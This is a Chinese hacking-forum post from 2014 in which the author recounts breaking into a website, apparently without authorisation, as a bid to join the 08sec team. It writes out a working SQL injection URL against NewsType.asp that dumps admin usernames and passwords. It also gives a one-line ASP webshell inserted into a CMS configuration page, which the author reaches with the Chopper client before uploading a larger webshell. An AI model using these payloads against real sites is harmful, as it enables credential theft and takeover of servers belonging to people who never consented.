##########################################
# Title :一次不算成功的检测(08sec申请转正帖)
# Time : 2014年5月5日
# Team : 08sec team
# Author : Vocin
# 首发 : 08安全小组
#######################################
小白文章 没任何亮点 利用的0day也是早就都知道的
=========================
利用的语句
[AppleScript] 查看源码 复制代码 /NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
=========================
今天偶然发现一个站点
结果没有可以利用的地方,只有静态网页
好吧 先御剑扫下目录
有个后台 看看
试了弱口令 admin admin ;admin888 admin888 等等 都不行
好吧 慢慢来
好像有FCK可以利用 点开看看
好吧 没的利用
慢慢来吧 先旁站下
找到一个网站
还是御剑扫下目录先
有个后台 看下
是个南方站的后台 阿弥陀佛 老衲记得南方站有个0day
试试看
既然如此 那就进后台看看吧
有数据库备份 可惜有限制
不过我看到个网站配置 而且可以修改 我顿时就邪恶了
南方后台不是可以在网站配置中插入一句话 然后菜刀连接 http://www.xxx.com/inc/config.asp
试试看
"%><%execute(request("1"))%><%'
菜刀连接之
成功连接 感谢上帝
然后就上传大马什么的拿到shell了
虽然拿到shell了 但是还不太会提权 也就这样了 后续的没法继续下去
纯粹小白文一篇 所以打算来08学习 增长知识 希望以后能有更大的进步
记一次不算成功的检测.docx
(3.2 MB, 下载次数: 0)
- |
发表于 2014-5-5 13:32:14
发表于 2014-5-5 16:10:20